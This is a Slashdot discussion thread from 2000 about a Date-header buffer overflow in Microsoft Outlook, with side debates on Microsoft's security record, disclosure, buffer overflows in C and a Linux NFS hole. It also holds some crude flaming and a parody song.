Report Of New Outlook Exploit

viktor_haag writes: "Report on MSNBC today of a new vulnerability that exploits a hole in (at least) Microsoft Outlook. The bad news is -- this time you don't even have to read the email; in fact, the exploit can take place before Outlook even places the email in your Inbox. Looks to involve overloading the message's Date header field. MS says they're going to release a security patch on July 19 to fix this hole." The irony is of course that we're so jaded by all these sad macro viruses that when something this serious hits, we shrug it off as 'Just another security hole,' but this one is massive.

I'm not jaded

[xee]

This really is "just another outlook security hole."


-------

Re:Date?

Dear:

[ ] Clueless Newbie [x] Loser [ ] Troll
[x] Signal 11 [ ] Pervert [ ] Geek
[ ] Spammer [ ] Nerd [ ] Elvis
[ ] Fed [x] Freak [ ] FascdotKilledMyPr
[ ] AOLer/Euronetter/PIer/MSNetter
[ ] Other: Unbearably self-righteous person

You Are Being Flamed Because:

[ ] You posted something unfunny that will inevitably be modded up as "+1 Funny"
[x] You posted something unfunny that will inevitably be modded up as "+1 Funny" by you using another one of your accounts
[ ] You started an off-topic thread
[ ] You continued a long, stupid thread
[ ] You posted a bitchy "Slashdot sucks!" message
[ ] You said "me too" to something
[x] You suck
[x] You brag about things that never happened
[x] You spend all day tapping the refresh button
[x] You posted something totally uninteresting
[ ] You posted sexist shit
[x] You wish to avoid the "wrath of the trolls" by flaunting your "edgy" sense of humor
[x] You masturbate to pictures of CmdrTaco's shoes
[ ] You are the leader of a secret Natalie Portman human-sacrifice cult

To Repent, You Must:

[ ] Give up your AOL/Euronet/MSN/Planet Internet account
[ ] Bust up your modem with a hammer and eat it
[x] Jump into a vat of acid while holding your monitor
[x] Actually post something relevant
[ ] Read the f****** FAQ
[x] Be Katz's love slave
[x] Apologize to me

In Closing, I'd Like to Say:

[ ] Blow me
[x] Bite me
[x] Get a life
[x] Never post again
[x] I pity your parakeet
[x] Go to hell
[ ] I think your IQ must be 5, join the Marines
[x] Take your s*** somewhere else
[ ] Learn to post or f*** off
[x] Do us all a favor and start linking to Illiad. He's funnier than you.
[x] See how far your tongue will fit into the electric outlet
[x] Go crying home to your mommy...wait, you still live at home. Nevermind.

Microsofts control of the Media

[prac_regex]

I would have to say the scariest thing coming out of the article on MSNBC is the quote "MSNBC.com learned of the flaw June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix."
Which has some interesting implications i think. For companys like Microsoft to be able to cover up important press releases is one thing, and for the security crowd im sure you've all heard the term "security by obscurity". It never works.
This event makes me wonder what things a company like AOL, who owns too much (MONOPOLY), can cover up at will. If AOL had a security flaw I wonder how much press it would get. I have less faith in AOL software in terms of security then Microsofts but when was the last time there has been a public release of them doing anything wrong?
The media sucks is my point.

Re:Oops

[Temporal]

And I modded you up on the same error. Oh well, easily undone. :)

------

Does Microsoft Guarantee Security?

[ChaoticCoyote]

I'm waiting for the first lawsuit (if there hasn't been one already) that takes Microsoft to task for being negligent in developing software with blatant security flaws. It's unlikely anyone can sue over bugs, but a failure to protect against malicious attackers might be actionable -- especially in the litiginous US.

Does Microsoft guarantee (or even imply) that Outlook (or Windows, for that matter) is secure?

Do we, as software developers, want to work in a world where our software is subject to judicial review? I think not...

Re:Does Microsoft Guarantee Security?

[toriver]

Does Microsoft guarantee (or even imply) that Outlook (or Windows, for that matter) is secure?

No. Standard Windows EULA usually says the software is delivered as-is, and that Microsoft are not responsible for problems related to use of the software. For NT, there is also a clause that is you actually should be able to prove Microsoft are responsible, the maximum compensation is $5.

Despite this, there are IS managers who choose Windows over Linux because they naïvely believe that since they paid money they are entitled to some sort of protection against mishaps.

Re:Does Microsoft Guarantee Security?

[Tpenta]

I'm no big microsoft fan, but come on, anyone who actually "guarantees" a product as secure is asking for big trouble. Guaranteeing or even implying such is like waving a red rag at a bull. Someone will take it as a challenge.

The best that anyone can do in this area is to take all possible precautions in development and address issues as they happen.

The really sad thing about this is that a majority of people will not load the patch and as such be vulnerable. The Morris worm all over again... *sigh*

Re:Bugtraq

[Remote]

At least with cars, they know that the oil needs to be changed every 5000 or so KM, and that when the tread on the tires is bare, those need to be replaced. People are still using IE 3.0! Users generally too lazy to upgrade software, even if there's a known security issue.

Emphasis was mine. This is precisely the problem: I am 100% sure that no one of the other 12 computer users at my office have the faintest idea that there may be security problems related to e-mail clients. We use Lotus Notes (yuck!) here, so I don't mind educating people on this new hole (I've never heard of any LN exploit) and I still think this is a problem to be dealt with by the sysadmins, which I'm not. The point is that most people don't keep insecure versions because they are lazy, they just can't imagine they are at risk. They just trust MS. Now, if I could just figure out why...

Alternatives?

[NetJunkie]

If this were almost any other app or company this wouldn't be front page news. How many other apps have buffer overflow exploits? Yes, Outlook has had its problems but look at other apps that have had them. How many problems were there with sendmail? The problems got fixed and it continues to be used today. Until someone comes out with a product to truely compete with OutLook people won't switch. What other LARGE enterprise mail systems are out there that offer the features of Exchange? Security people don't usually pick the mail system, management does. Management just can't pass up the calendaring and scheduling features of Exchange.

Instead of constantly bashing OutLook someone should actually go write a competing client. I'm currently using Mozilla's IMAP client. So far it's the most full featured by far. Sadly, it crashes about 3 times per day and on restart it sometimes won't create new messages. I can't wait for Evolution, but how long will that be?

I'd like to see all the "MS SUCKS!!!" people in here sit down and write an app that does everything OutLook can do. Yes, it has its problems but you can patch it, just like everything else. Until there is another alternative, even a close one, people won't switch.

Re:Alternatives?

[Tsujigiri]

Until there is another alternative, even a close one, people won't switch.

What about Lotus Notes/Domino???

Re:Alternatives?

[Lordfeff]

This is in response to everyone's comment concerning this thread.

You can't compare applications unless you put them in a context. You need requirements (ack - I almost vomited while typing that part in). Outlook has the advantage of being intuitive for Microsoft users. Other apps work for other people. Do you think that the app for you has no flaws/holes? I bet there's someone out there who will disagree...

I agree with the original statement that this wouldn't have been as big a deal if it were any other company's product. But the flip side is that Microsoft shot themselves in the foot. If they didn't shove all of their crap down everyone's throat, then the number of Outlook users would be smaller and it wouldn't be as big a deal.

As far as MS SUCKS people writing an app to compete with Outlook goes, I bet that it could be done. The reason why it hasn't -- most people who hate microsoft don't like to develop features on top of a shoddy core. Most anti-microsoft developers spend time working out their bugs before releasing it. Also, I personally HATE gui development -- it's so BORING (to me. no offense to those of you who like it). I would rather have a nice text interface for my mail client (like Pine).

If you want the ideal solution, burn it all down and start over.

Re:Wow.....

[TrentC]

Putting aside all the joke and the "evil empire" comments and everything that the /. community feels about Microsoft, don't you think that a company of that size (and with their software controlling so many critical sites around the globe> has a responsiblity to go overboard on quality assurance?

That's one of the hallmarks of being a monopoly; if you have no competition, there's not as much reason to improve your product (except maybe to add nifty vendor lock-in features).

Actually this is not the first

[tilly]

The earliest that I know of happened before you probably ever heard of the Internet. Go look up the Morris Worm.

And I am sure that was not the first, I heard of it because it was the last time that an individual accidentally took down the Internet.

Regards,
Ben

Re:THE EXPLOIT IS HERE!

[xianzombie]

great, but what does it actually due.

forgive me for not being a coding type o' guy....

Re:This one's better

[fluffhead]

I myself have been wondering ever since Win2k came out with this "feature" how exactly M$ was going to issue system patches & upgrades. Can't their installer just overwrite the protected files and update whatever registry entries (or whatever) control this feature? Don't know since I haven't played with Win2k as yet....

#include "disclaim.h"
"All the best people in life seem to like LINUX." - Steve Wozniak

Re:Bugtraq

[wafath]

> Anyway, I think that the problem is people actually getting/using the patch.

There is a very simple, and elegant solution. Write a program that exploits the security flaw that patches the affected system, and then replicates itself. To be carefull it should have a self termination date, and maybe even maintain a list of addresses on a central server that it has been sent to, etc.

Of course there are complications to this, first and most importantly that it is probably illegal. Therefore the above thought is provided for humor and iorny purposes, and not an attempt to encourage anyone to break the law.

Oh, and IANAL.

W

Buffer overruns: what's vulnerable?

[Segfault+11]

I'm really just a novice programmer, and I'm fairly rusty since my high school days learning BASIC (Pascal would have been much nicer). I understand the basic concept of buffer overruns, and I'm well aware of it being a common exploit.

What I'd like to know is this: are programs written in any language vulnerable to an overrun? If not, is buffer checking something that is only/mostly necessary with C and C++, or is it highly dependent on the compiler/interpreter?

Re:Buffer overruns: what's vulnerable?

[Spasemunki]

As I understand it, any language with unchecked array bounds is subject to buffer overflow problems. Java, for instance, can't have buffer overflow problems; if i declare and int buffer[4] and try to write into memory location buffer[5], an exception is thrown. In C, however, writing into location buffer[5] simply means that I write into memory adjacent to the end of the array

(Nitpickers: yeah, I know, buffer[3] is really the last allocated space, meaning that the starting address of buffer[5] is actually 4 * sizeof(int) from the start of the array, and not adjacent to the end of the buffer. Children should be taught to count starting at zero.)

So, it is a vulerability specific to languages that don't check bounds on arrays. However, it is just as much the fault of the programmer. If you don't validate input, you shouldn't be surprised when things don't go as planned. In a Java program that wasn't given special bounds checking, the program would die on the exception, better than providing an exploit, but bad form nonetheless.

"Sweet creeping zombie Jesus!"

This one's better

[mrogers]

From the Microsoft security bulletin:

Why doesn?t IE 5.5 eliminate the vulnerability for Windows 2000 users?

IE 5.5 cannot replace the affected component because of the System File Protection feature in Windows 2000.

Nice "feature", guys.

$ cat < /dev/mouse

Re:This one's better

[Evangelion]

This is the man p... err, help document for the utility used to alter the behaviour of System File Protection.

What I would guess, is that when you install software as Administrator, in which case the installer would run this after the software was installed - so that the definitions of Protected Files in the database gets updated, and the new versions cached. You wouldn't be able to do this as a normal user... I guess, anyway. I don't see how this would affect IE fixing Outlook's bug.

It's not an answer, but it should shed some light on the matter.

Now I'll sit here and wait for MS's lawyers to come at /. for copyright infringement. =)

System File Checker

System File Checker (sfc.exe) is a command line utility that scans and verifies the versions of all protected system files after you restart your computer. If System File Checker discovers that a protected file has been overwritten, it retrieves the correct version of the file from the %systemroot%\system32\dllcache folder, and then replaces the incorrect file.

Syntax:

sfc [/scannow] [/scanonce] [/scanboot] [/cancel] [/quiet] [/enable] [/purgecache] [/cachesize=x]

Parameters:

/scannow


Scans all protected system files immediately.

/scanonce

Scans all protected system files once.

/scanboot

Scans all protected system files every time the computer is restarted.

/cancel

Cancels all pending scans of protected system files.

/quiet

Replaces all incorrect file versions without prompting the user.

/enable

Returns Windows File Protection to default operation, prompting the user to restore protected system files when files with incorrect versions are detected.

/purgecache

Purges the Windows File Protection file cache and scans all protected system files immediately.

/cachesize=x

Sets the size, in MB, of the Windows File Protection file cache.

Notes

You must be logged on as an administrator or as a member of the Administrators group to run System File Checker.

If the %systemroot%\system32\dllcache folder becomes corrupt or unusable, use Sfc /scannow, Sfc /scanonce, or Sfc /scanboot to repair the contents of the Dllcache directory.

In addition...

[ChiaBen]

IMHO the people using *nix are (in general) more informed and cautious about the 'features' in their software than your average Windows user.

regards.

Non-Report of New Linux NFS Remote Root Exploit

[The+Pim]

Posted never by no-one
from the not-all-that-surprising dept.
Yes, remote root on recent versions of (probably) all Linux-based systems that include NFS. Fortunately, most of them seem to have issued updates already. See the Security Focus Record for a summary (and, yes, an exploit). The irony is of course that we pretend to be concerned with security, but we really care only for ridiculing Microsoft, so when something this serious hits Linux, we don't even report it.

Re:Non-Report of New Linux NFS Remote Root Exploit

[mwalker]

Moderation Totals:Troll=2, Insightful=1, Interesting=2, Informative=1, Total=6.

Those are the moderation totals on the parent (this) post, as of 7:26pm 7/19/2000.

Before you dismiss this as off-topic, read on.

How is it that 3 people think that this is an interesting or informative post, and 2 people think that he is Trolling, i.e., intentionally trying to disrupt an intelligent conversation?

If something is thought-provoking, it is insightful, even if you disagree with it. If something is a deliberate attempt to disrupt a conversation, it's a Troll.

Now, to get on-topic:
Yes, remote root on recent versions of (probably) all Linux-based systems that include NFS. Fortunately, most of them seem to have issued updates already. See the Security Focus Record for a summary (and, yes, an exploit).

It's on-topic. It's thought provoking, and it's informative. He hunted down a link for you. It's a massive security hole, just as big as the one in Outlook. Yes, you may disagree with his opinions or conclusions (I sure as hell do - no one is being paid billions of dollars to quality control Linux, it's the difference between a flaw in a gift and a flaw in an expensive PRODUCT) but that doesn't mean he's trying to disrupt the conversation. This comment is an insightful reality check. If his link was bogus, or his information was incorrect, Troll him. But if his facts are VALID and you disagree with his OPINION, mod him UP so we can all think about it and decide.

Moderation is not about supressing opinions with basis in fact, it's about supressing l33t hax0rz who want some Natalie.

Calling this guy a troll makes us look bad. Mod him up, and take his argument apart.

Re:Non-Report of New Linux NFS Remote Root Exploit

[Tarnar]

Tone and delivery are just as important to delivering an argument as the facts and basis of the argument. Never forget that.

A rabid Linux zealot that runs into a convention of MCSE's and starts slamming everthing and everyone around him won't be treated nicely, even if every argument he uses is based in fact.

That said, the post to which you refer was just that. His post was inflammatory and arrogant. Troll, perhaps not. But worthy of the 4 positive moderations it was awarded? I think not.

On another note, I'd say an NFS vulnerability isn't as major as this Outlook one is, not by a longshot. And I can name dozens of Linux security exploits that have come out recently. They don't get this sort of press because of facts like 'MS has been sitting on this exploit since mid-June' and 'MS still has not released fixes for it's flagship product, Win2k.' And at least with the NFS vulnerability, you can choose to turn off your NFS server. Telling people they can't check their email is a lot less of an option.

Re:Non-Report of New Linux NFS Remote Root Exploit

[VB]

I agree with the following response to this. We should be unreligious and objective when engaging in M$/Linux discourse. My use of the all-too-familiar acronym for the Redmond Corporation may color me a hypocrite, but, the undertones of it's usage speak very accurately to it's use. Plus: less typing and everyone knows to whom I refer.

There is an out-of-the-box feature in Linux that has existed longer than I can recall in it's various forms. Currently, it's a simple matter of following these simple precautions:

1. in /etc/rc.d/rc.M {if running Slackware} add the following:
   if [ -x /etc/rc.d/rc.firewall ]; then
   . /etc/rc.d/rc.firewall
   fi
   
   • Have the following file named /etc/rc.d/rc.firewall that includes:
     /sbin/modprobe ip_masq_portfw
     /sbin/modprobe ip_masq_ftp
     /sbin/modprobe ip_masq_raudio
     /sbin/modprobe ip_masq_irc
     echo 1 > /proc/sys/net/ipv4/ip_forward
     /sbin/ipchains -F
     /sbin/ipchains -A input -s 0.0.0.0/0 -d 0.0.0.0/0 -j DENY -l
     At this point you are secure...
     If you're not running a server, do nothing further
     
   
   
2. Do not run your system as root;
   
3. Do not install binary packages unless their source can be authenticated;
   

You can now read mail, edit documents, send mail, and surf the web securely. No programs that come in, even JavaScripts will be able to trash your system, or even erase files in your user directory. If you're even more paranoid, don't surf the web as your normal user account. Create one for this express purpose.

If you need to do Word and Excel documents, get StarOffice 5.2. If you think the 90MBytes memory hit is expensive, add 64 MBytes to the 64 MBytes you need already to run Win98 with Office97/2000. It's less expensive to buy 60 bucks worth of memory than it is to buy anti-virus software that slows down your machine and takes hours of maintenance every month, plus the additional money it costs to put in ZoneAlarm, or some other firewall. The vendor should lock down their stupid OS and all it's little macro crap, period. If you need dancing pigs; then use Windoze. Consider yourself the ultimate risk-taker.

The poster should have posted facts; not inflammatory remarks. Since I feel I'm headed in a similar direction, I'll post my 2 cents.


Linux rocks!!! www.dedserius.com

Re:Non-Report of New Linux NFS Remote Root Exploit

[The+Pim]

Both bugs are serious, but the Linux exploit only affects servers.

No--this is a critical misunderstanding! rpc.statd is run by NFS client machies. And probably (this is a guess) running by default on machines with NFS client support installed.

Re:Non-Report of New Linux NFS Remote Root Exploit

[The+Pim]

NFS is nearly always firewalled.

And mail is nearly always filtered at the MTA.

As pleasant as it is to suppose good that security practices are followed, I guarentee there are scads of home Linux boxes with rpc.statd running and no firewall.

Re:Non-Report of New Linux NFS Remote Root Exploit

[The+Pim]

Heck, I'll analyze my post. I had read about both the nfs exploit and the outlook exploit on Bugtraq (and maybe elsewhere) before the Slashdot article. I thought both were stunningly serious, and that it was incredibly ironic, even perversely pleasing, that major holes in linux and microsoft were found one upon the other.

Then I read Taco's post. He pointed out one irony, to be sure, but I was bowled over by the meta-irony that he overlooked the overwhelmingly greater irony--that Slashdot had failed to cover a similarly embarassing linux exploit.

So, I couldn't resist the urge to parody his article. I tend to agree that the Micrsoft bug is the more damaging, but both are of sufficient magnitude that both parties should take a good hard look in the mirror.

PS. I don't think I've ever had a post moderated four ways :-)

Blind leading the blind

Since apparently nobody here has actually bothered to find out the truth about this bug and since everyone is eager to display his ignoronce through blind Microsoft bashing, let me point out that this only effects Outlook IMO and Outlook CW with the Internet Email service added, and only if you have a version of Internet Explorer before 5.01 SP1. Which means most people (including everyone where I work and run the network) are not affected by this problem. And, everyone can have the problem fixed with a quick trip to the Windows Update site. I have verified this because I have a copy of the exploit and have tested it against several systems here. How many of you Microsoft bashers can truthfully say that?

Score: -1 for spoiling the fun, -1 for not bashing Microsoft, -1 for actually doing research to back up my claims

Funny thing, MSNBC reporting on MS. Check this.

[TheLocustNMI]

This article, brought to my attention by NerdPerfect yesterday states that SANS found the hole on June 27, but agreed with Microsoft to not release the information until Microsoft posted a workaround on July 14.

Well, i bet someone is happy this didn't get out in the wild before then, eh?

Ham on rye, hold the mayo please.

You could have read about this on eWaddle first.

[codeguy007]

Well, just thought you should know that eWaddle had this story up first.

Check out eWaddle and Read, Register and post. BTW we don't turn down 98% of Stories.

Re:Wow.....

[Masem]

It seems like 90% of all recent (within last 3 years) exploits that are not related to the activeX/scripting model are due to buffer overloads. Using C as the example, even if you specify the length of a char*, you can easily go past that with bad buffer copy mechanisms - even sprintf, I believe, can overflow a buffer. The large number of buffer exploits of late probably came initially from a few small but notable cases, but then suddently anything with variable string input or arguements could become a problem, rising to the number of buffer exploits we see today.

Not checking inputs before the buffer is copied into is a bad programming flaw, but only recently realized as being potentally hazardous. Thus, take all programmers that were in the workforce in 1990, and they would probably have missed adding the buffer checks, but now with buffer overflows a problem nearly every day, programmers in 2000 are much more conscience about it, but there is still legacy code that probably does this buried in code. Especially when the field itself is not thought of in a textual sense (a date field), these things tend to get overlooked in the general design of the program. However, this should only reinforce the use of a lint-like system after various compiles in order to find potental buffer overflows. Languages like C++ and Java provide some protection here assuming you use the typed Strings, but you can still create a buffer overflow without thinking about it.

I'm very surprised by this!

[BigBlockMopar]

Hands up all who are surprised by this!

I'm very surprised it took so long for this bug to be discovered!

Re:I'm very surprised by this!

[Dman33]

I'm very surprised it took so long for this bug to be discovered!

Yep, the beauty of Closed Source...

Outlook vulnerable?

[elbane]

Who would have guessed that more security holes would be found in Outlook? BTW, fp.

Re:Outlook vulnerable?

[powerlord]

One of the reasons I like reading the Wall Street Journal. Everyone has a bias, at least wit them I know its money.

Re:Outlook vulnerable?

[powerlord]

I agree, and because of that I am especially wary when I saw this:

"This is certainly a serious one," said Steve Lipner, manager of the Security Response Center at Microsoft. Lipner said the stand-alone Outlook patch might not be ready until Wednesday, but concerned Outlook users can protect themselves immediately by downloading and installing the newest version of Internet Explorer at Microsoft's download site. That software includes code that will stop the vulnerability.

So the way to stop the virus is to load IE5.5? Why? Did they already know about the virus for a while and do nothing to tell anyone else (ie. release a patch for the existing users while developing the future release)? Sound like a malicious plan to force users to upgrade to a new version, as long as the bug wasn't uncovered too soon.

Re:Outlook vulnerable?

[GodSpiral]

Actually that complete BS.

The only way to stop the virus is to not use outlook express.

They are trying to make it sound less bad than it is by saying that default IE5.5 or 5.01sp installation is safe. That's cause the default installation doesn't install OE. The story even said something like most corporate networks with Outlook are safe, because they don't use pop3 or IMAP4, but i'm sure more than one does.

Maybe my ISP went down today to fix this major crap.

Re:Outlook vulnerable?

[SoftwareJanitor]

Propoganda fuels this website.

So you are telling me that propaganda doesn't fuel pro-Microsoft sites or any other sites?

The biases of Slashdot are well known, and not a secret. Other sites often try to claim non-biased reporting, but in reality, everyone has their biases.

Re:Outlook vulnerable?

[bigchris]

Hello, we're talking about email here! How many features can you add to email? I beleive that the only features that have really been of any use are as follows:

1. colour highlighting (yeah, that's right, colour highlighting :) If only more email apps had this, it really is a very useful feature in Outlook!)
   
2. filters
   
3. actually sending and receiving mail properly (does Outlook do this properly?)

That's it folks! That's all that is really needed. Of course now that RTF mail is now a fact of life (and I don't like it one little bit, btw) most mail clients really need to be able to display it.

Re:Outlook vulnerable?

[jackmama]

The problem is caused by inetcomm.dll, which is replaced when IE 5.5 or IE 5 Service Pack 1 are installed. Whether this means they knew about the bug and quietly patched it, or it was simply changed as part of development, I don't know. Since the patch is now available, I don't think it can be attributed to a sneaky plan of forced upgrading.

Re:Outlook vulnerable?

[jafac]

This is not propaganda. Microsoft is empirically bad.

if it ain't broke, then fix it 'till it is!

Re:Outlook vulnerable?

[skoda]

On the same day that Apple announces a beyond-way-cool new computer design, news leaks out that a *killer* security flaw has been found in MS Outlook.

Mere coincidence? You be the judge ;)

Re:Outlook vulnerable?

[davstok]

>>I beleive that the only features that have really been of any use are as follows:...<<

Well, chacun a son thingy. How about file attachments (I'm always sending and receiving software as attachments). How about distribution lists? How about sorting, searching and archiving? And while maybe not essential, how about HTML emails and HTML editors (nice for Birthday greetings and suchlike)?

Re:Outlook vulnerable?

[davstok]

>>So you are telling me that propaganda doesn't fuel pro-Microsoft sites or any other sites?

Heavens, MS and propaganda?. MS people are calm logical thinkers who choose things on technical merit, completely untouched by emotional issues or political or religious conviction. Surely everyone knows that...

Re:Outlook vulnerable?

[bigchris]

Oops, forgot file attachments. Sorry 'bout that (what was I thinking!)

I still don't really agree with HTML emails!

Re:Outlook vulnerable?

[sylvester]

Does this look like fucking securityfocus.com? Get a clue /. Why don't you report all of the other vulnerabilities in UNIX/Linux OSs?

while it's obviously a troll, I'll respond.
A quick search for security brings us:
2.2.16 Kernel Released - Fixes Security Hole
Open-Source != Security; PGP Provides Cautionary Tale
Red Hat 'Piranha' Security Risk - And Fix
FreeBSD implicated in HotMail security problems

Looks like they do. Granted, there're more MS security holes posted. However, I would say that there are more MS security holes. The problem only arises when/if they are posting in a proportion (MS vs. Open Source) that is not close to the real proportion of significant problems.

Re:Outlook vulnerable?

[Malc]

"However, I would say that there are more MS security holes"

It seems to me that the biggest security risk would come from newly added features to a product. Perhaps MS add more new features to their products than people? They're not playing catch up like other people.

Of course, so might say that it is just because MS are incompetent when it comes to security ;)

Re:Wow.....

[Kintanon]

Well, considering that at the moment the easiest fix is to install ANOTHER piece of their software which happens to be a web browser (It's not part of the OS, you can remove it whenever you want, it won't break anything, WE PROMISE!) I think that this bug might just be a vendor lock-in feature.>:)

Kintanon

Re:Security certification needed?

[jason_aw]

> Microsoft ... would benefit

Hehehehe. *ahem*. Sorry.

You /really/ think that Microsoft are going to open up their code to an auditing organisation?

You /really/ think that Microsoft are going to benefit when the auditing organisation takes one look and falls over laughing?

I think you're confusing "benefits Microsoft" and "benefits consumers"... sometimes it seems those aren't just not the same thing, but actually mutually exclusive.

This isn't new.

[NetJunkie]

This happens all the time. If you find a security bug you usually give the vendor/author a chance to fix it in a timely manner before announcing it to the world.

"Outlook not so good"

[Benwick]

...that's what the magic eightball told me, and I have sworn by it ever since. In fact Outlook is excrement and shouldn't be used by anyone... as long as people keep using it, all the security holes will be found and viruses/trojan-horses spread... Makes me glad I use Eudora. Heh heh heh. No "I love you" e-mails for me! {sniff}

Will Microsoft prosper in the 21st century?
"Don't count on it."

MSNBC Hijinx

[MrEd]

Things that struck me as funny in this article:

• The story interrupted half-way down for a link to "Microsoft Profits top Wall Street Forecasts"
• Not once does the article suggest that the most comprehensive fix is not using Outlook... But wait, how are users supposed to switch email clients when Outlook 4, Outlook Express 4, Outlook 5, and Outlook Express 5 all use different proprietary binary formats?
• USSR labs... Did they pick up that name around 1991 by any chance?

Just as with any news source, there's going to be bias. It's just that most news sources don't have such obvious and entertaining bias as MSNBC.

Vulnerabilities==virii

[11223]

What was the last hole this big? The clipart SHS hole - exactly causing the life_stages joke worm. This time somebody clever will make another virus - and it will spread like wildfire, before it can even get patched!

Our only hope is to make an antivirus email that uses the hole to install the patch and then forwards itself off.

Re:Vulnerabilities==virii

[afc]

Excuse me Mr. Coward, but you seem to imply that the fact that a MUA is "text based" guarantees it is more secure. Inquiring minds want to know why is that so? Does "MUA is text-based" imply "MUA cannot execute attached content"?
--

Interesting times

[kressb]

Well, let's see. Today we have:

1) Star Office getting GPLed.
2) Apple releasing many new cool products.
3) Microsoft getting it's ass kicked over a
really serious sercurity hole.

It's a great time to be a Microsoft hater. :)

Re:Interesting times

[Yamao]

Well, on Slashdot, anyway, where all these things are reported. Anywhere else, it's still just a necessary evil - like taxes.

Again?

[Malk-a-mite]

From the HNN
"Some stories make references to both problems.
Having Outlook security problems so frequently that they start to blur together is a dangerous thing."

Sadly this says it all.

Malk-a-mite

Re:nothing to get excited about

[Fist+Prost]

That will never take off, due to the fact that most (at least most of the more popular) viruses rely on end-user action to work. This is not the case here, however once someone with half a brain sits and explains to these insurance companies that they will be insuring god-only-knows what is on people's systems, in case that person is stupid enough to click on "A special message from %S"...

Re:Just to be fair here...

[kaphka]

This bug is a standard buffer overflow vulnerability, an accident, and not a design bug

It's interesting, although I agree with all the facts in your post, I disagree with your attitude. In my opinion, this bug is much more disturbing than the damage caused by clueless users who run untrusted applications after countless warnings not to. This is a security hole; allowing users to send attachments is not.

Of course, it is true that this is simply a bug, and it could have happened to anyone. But it didn't happen to anyone, it happened to Microsoft, and they deserve some measure of condemnation for it.

Re:Its Time For Eudora

This flaw is not relegated to Outlook only - any email client which uses the IE engine to display HTML content (Eudora is one such mail client) leaves the door open for this exploit. See this article at sans.org for further details.

You may be vulnerable too!

[Breace]

From http://www.microsof t.com/technet/security/bulletin/fq00-043.asp:

How can I tell if I'm vulnerable to this issue?

If any of the following apply to you, you are not affected by this vulnerability:

- You are running a default installation of Internet Explorer 5.01 Service Pack 1.
- You are running a default installation of Internet Explorer 5.5 on any system except Windows 2000.
- You are using Outlook and it's configured to use only MAPI

If none of the above apply to you, you are affected by the vulnerability.

--
So all you Linux users, beware. :)

Anyways, it's this kind of warped logic that caused the bug in the first place.

Breace

"OOPS, I did it again" by Bill Gates

"Oops...I Did It Again"
by Bill Gates

Yeah yeah yeah yeah yeah yeah
Yeah yeah yeah yeah yeah yeah

I think I did it again
I made you believe you've got security
Oh baby
It might seem like a feature
But it doesn't mean that I'm serious
'Cause to lose all my reason
That is just so typically me
Oh baby, baby

:Chorus:
Oops!...I did it again
I created a bug, got lost in the game
Oh baby, baby
Oops!...You think it's secure
That its sent from above
I'm not that innocent

You see my problem is this
I'm dreaming away
Wishing that bugs, they don't exist
I cry, watching bugtraq
Can't you see I'm a fool in so many ways
But to lose all my customers
That is just so typically me
Baby, oh

:Chorus:
Oops!...I did it again
I created a bug, got lost in the game
Oh baby, baby
Oops!...You think it's secure
That its sent from above
I'm not that innocent

Yeah yeah yeah yeah yeah yeah
Yeah yeah yeah yeah yeah yeah

"All aboard"
"Bill, before you go, there's something I want you to have"
"Oh, it's beautiful, but wait a minute, isn't this...?"
"Yeah, yes it is"
"But I thought the old lady dropped it into the ocean in the end"
"Well Billy, I went down and got it for you"
"Oh, you shouldn't have"

Oops!...I did it again to your trust
Got lost in denial, oh baby
Oops!...You think that I'm sent from above
I'm not that innocent

:Chorus:
Oops!...I did it again
I played with your heart, got lost in the game
Oh baby, baby
Oops!...You think I'm in love
That I'm sent from above
I'm not that innocent

:Chorus:
Oops!...I did it again
I created a bug, got lost in the game
Oh baby, baby
Oops!...You think it's secure
That its sent from above
I'm is not that innocent

Re:This email will self destruct in 30 seconds

[generic-man]

if you set the date to the distant past, say, the year of 1985

You know you're getting old when your childhood is referred to as "the distant past."

Re:Bugtraq

[Evangelion]

My point is is that this bug has nothing to do with thier security model or thier philosophy, regardless of how much you want to innovate new ways to hate them.

It's a buffer overflow in the Date: field. A bug. Pure and simple. Not the result of a design decision, or a philosophy. There have these bugs in pretty much every major software package written in C/C++. It's only news here because /. is a nexus for MS haters.

Re:Not really

[rmpotter]

"I thought by now, we'd be rid of buffer overflow bugs."

You'd think wouldn't ya. L-Soft (Listserv) just released a patch for a similar buffer overrun problem here:

http://www.lsoft.com/news/default.asp?item=Advis ory1

When I'm not using Pine, I do use Outlook on NT Systems. Amazingly, I've never had a problem with Outlook. One precaution I take is to configue Outlook so only headers are displayed -- an extra mouse click is needed to display the email body.

As I've been saying for a few years, when *nix owns as many desktops as MS, there will probably be justas many security problems -- maybe more.

USSR *security*?

[eshaft]

Did anyone else catch that the name of the South American firm in the article was "USSR"? So first Hitler escapes to South America, and now the former USSR is posing as a security firm down there too?

Re:Bugtraq

[Evangelion]

Do you have any idea what a buffer overflow actually is?

Basically, you fill a fixed-size array with enough data so that you overwrite other parts of the program, do some magic (which is somewhat explained here), and then get the program to execute some arbitrary code of your own writing. Developing said code (i.e. actually writing the exploit) generally takes time, and is limited to one software/os/platform/version combination.

This has *no* relation to how the code is initially written.

A program which reads one line of code from the user, saves it to a fixed sized buffer, and then prints it out is vulnerable to a buffer overflow.

Moderators:

[Dman33]

Why is it that when I have moderator access there is nothing worth modding up? Then there is today, I do not have mod access and here is this hilarious post that is only +1 funny!!!

This one deserves +5!

email should be text.

[Error27]

I know that this is not another macro virus but still reading the article pisses me off because of this quote:

?This vulnerability can affect a user even if the user follows what would normally be safe computing practices.?

It's absolutely horrible how badly microsoft has infected their customers with the idea that it is only stupid users who get attacked by viruses. I just really want to slap someone in fact everytime I hear that, "Hey those people shouldn't have clicked on the attachment." NO!! Email should be text. Just blame your users for your crappy programs why don't you?

This works into so many things.

The I was with a friend of mine setting up a some software on Linux. He was treating the machine so gently, doing things slowly and not starting too many things at once. I had to tell him, "Hey this is Linux you can't hurt it. Go ahead be rough..." With windows users feel so bad that _they_ crashed the system. But it wasn't them it's THE CRAPPY SOFTWARE STUPID.

Or when they are typing a document they blame themselves for not saving enough. This isn't right. That's crap. You shouldn't have to take that from a computer.

The computers job is not that difficult. Linux has shown that people just working for the heck of it can make decent software. There is no reason why microsoft should be able to make some decent software. And there is NO reason to blame the users when the system is crashes.

Microsoft software may be good for playing games and for watching asf. (although it's still ticks me off when the computer crashes half way through a movie.) But for doing _actuall work_ it's a crappy crappy crappy system.

Is Microsoft Held to a Higher Standard?

[liebermonster]

